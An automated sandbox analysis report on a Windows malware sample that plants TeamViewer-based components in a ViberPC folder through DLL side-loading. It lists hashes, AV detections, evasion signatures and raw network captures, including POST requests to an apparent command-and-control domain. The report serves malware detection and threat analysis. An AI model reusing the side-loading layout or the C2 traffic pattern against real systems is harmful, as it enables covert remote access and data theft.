Windows Analysis Report wogZe27GBB.exe

Overview

General Information

Sample Name: wogZe27GBB.exe
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe Virustotal: Detection: 53% Perma Link
Source: wogZe27GBB.exe ReversingLabs: Detection: 62%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll ReversingLabs: Detection: 51%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.wogZe27GBB.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0049B32E __EH_prolog3,CryptGenRandom, 5_2_0049B32E
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA, 5_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_006F605B CryptReleaseContext, 5_2_006F605B

Privilege Escalation:

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Jump to behavior
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Jump to behavior
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 3_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 3_2_6E5C2960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 5_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 5_2_6E5C2960

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86008Content-Type: multipart/form-data; boundary=--------2871961252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85958Content-Type: multipart/form-data; boundary=--------2035396243User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free 